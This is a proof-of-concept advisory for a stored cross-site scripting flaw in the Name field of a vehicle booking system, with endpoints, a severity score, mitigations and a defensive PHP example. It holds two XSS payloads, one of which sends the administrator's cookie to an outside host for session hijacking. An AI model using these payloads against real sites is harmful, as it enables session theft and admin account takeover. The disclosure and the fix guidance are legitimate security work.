CVE-2024-48246 PoC — Vehicle Management System Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
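Title: Vehicle Management System Cross-Site Scripting Vulnerability (CVE-2024-48246)
Description: Vehicle Management System is a vehicle management system written by the individual developer Warren Daloyan. Vehicle Management System version 1.0 contains a cross-site scripting vulnerability, which stems from a stored cross-site scripting flaw in the Name parameter.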
Description
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)
Readme
# CVE-2024-48246
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)

# Description

Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. A malicious actor can inject malicious payloads into the Name field, which are stored and executed when an administrator views the booking list on /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.

# Affected Parameter

Name=

# Affected Endpoints

/vehicle-management/booking.php

/vehicle-management/bookinglist.php

# Vulnerability Details

Type: Cross-Site Scripting (XSS)

Vendor: Vehicle Management System

Affected Version: 1.0

# Attack Vectors

Guest User Attack:

1. A guest user inputs a payload into the Name parameter at /vehicle-management/booking.php.
2. The malicious payload gets stored and executed when an admin views /vehicle-management/bookinglist.php.

Example payload for session hijacking:

```
<img src=x onerror=this.src='http://oastify.com"+document.cookie>
```

# Alert Example:

Another payload can trigger an alert or perform other malicious actions without requiring cookies:

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

Note: A SQL Injection error may occur during payload submission, but it will still get stored and executed.

# Impact

Exploiting this vulnerability allows attackers to:

- Execute arbitrary JavaScript in the context of the administrator’s session.
- Hijack administrator sessions via stolen cookies.
- Perform unauthorized actions or escalate privileges.

# Mitigation

- Sanitize and encode user input for all parameters, especially Name.
- Implement a Content Security Policy (CSP) to limit script execution.
- Update to a patched version if available.
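
The first two mitigations applied to a booking flow like the one described, as an added example that is not the application's own code: the table schema, the function names and the in-memory SQLite database are assumptions. It also binds the Name value as a SQL parameter, since the note above reports a SQL error when markup is submitted.

```php
<?php
declare(strict_types=1);

// Hypothetical schema and helper names; the application's real source is not shown on this page.

/** Store the Name value through a bound parameter so quotes or markup cannot alter the SQL. */
function save_booking(PDO $db, string $name): void
{
    $name = trim($name);
    // Bound the input only; encoding at output (below) is the XSS control.
    if ($name === '' || strlen($name) > 100) {
        throw new InvalidArgumentException('Name must be 1-100 bytes');
    }
    $stmt = $db->prepare('INSERT INTO bookings (name) VALUES (:name)');
    $stmt->execute([':name' => $name]);
}

/** HTML-encode a value for element content or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the admin booking list with every stored value encoded at output time. */
function render_booking_list(PDO $db): string
{
    $rows = '';
    foreach ($db->query('SELECT id, name FROM bookings ORDER BY id') as $row) {
        $rows .= '<tr><td>' . (int) $row['id'] . '</td><td>' . e((string) $row['name']) . "</td></tr>\n";
    }
    return "<table>\n" . $rows . "</table>\n";
}

/** Headers for the admin page: a CSP without 'unsafe-inline' stops inline event handlers from running. */
function send_security_headers(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
    header('X-Content-Type-Options: nosniff');
}

// Constructed demo: in-memory SQLite stands in for the application's database.
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE bookings (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    save_booking($db, "O'Brien <b>test</b>"); // constructed sample value
    echo render_booking_list($db);            // markup in the name is emitted as inert text
}
```

Encoding belongs at the point of output in bookinglist.php, because values stored before the fix stay in the database and are only neutralized when every render path encodes them.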

# Severity

High (CVSS: 8.2)

Attack Vector: Network

Privileges Required: Low

User Interaction: Partially Required (Admin views booking list)

File Snapshot

[4.0K] /data/pocs/ef6054890fb4abed8e2f8e5e3983f31306e61e1f
├── [1.0K] LICENSE
└── [2.0K] README.md

0 directories, 2 files